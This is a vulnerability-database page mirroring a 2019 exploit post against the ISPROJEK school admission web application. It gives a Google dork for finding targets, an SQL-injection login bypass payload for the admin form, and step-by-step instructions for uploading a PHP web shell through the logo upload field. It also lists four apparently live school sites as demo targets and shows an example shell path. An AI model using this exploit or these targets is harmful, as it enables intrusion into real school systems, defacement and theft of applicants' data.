ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1534385 漏洞类型
发布时间 2019-03-14 更新时间 2019-03-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019030120
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork: intext:"ISPROJEK"

[+]Tested on: Windows 10 x64 
======================================= 
[+]Proof Of Concept: 

Find website with the dork
Login url will be site.sch.id/path/login.php

Login with this detail
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+

You can upload your file via
1. Click Setting or you can paste the link /index.php?p=f_editadmin
2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1
3. Fill all the form, then upload your Shell (php extension) in the "File Logo"

Your files will go to site.sch.id/path/images/logo/yourshell.php
example:
https://aplikasi-cbt.com/ppdb/images/logo/captcha.php

NB: 
- filetype of this uploader is php
- Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data

Demo sites:
https://aplikasi-cbt.com/ppdb/login.php
https://ma-arrosyidiyah.sch.id/ppdb/login.php
https://mtsyppsbandung.com/ppdb/login.php
https://masirnamiskin.com/ppdb/login.php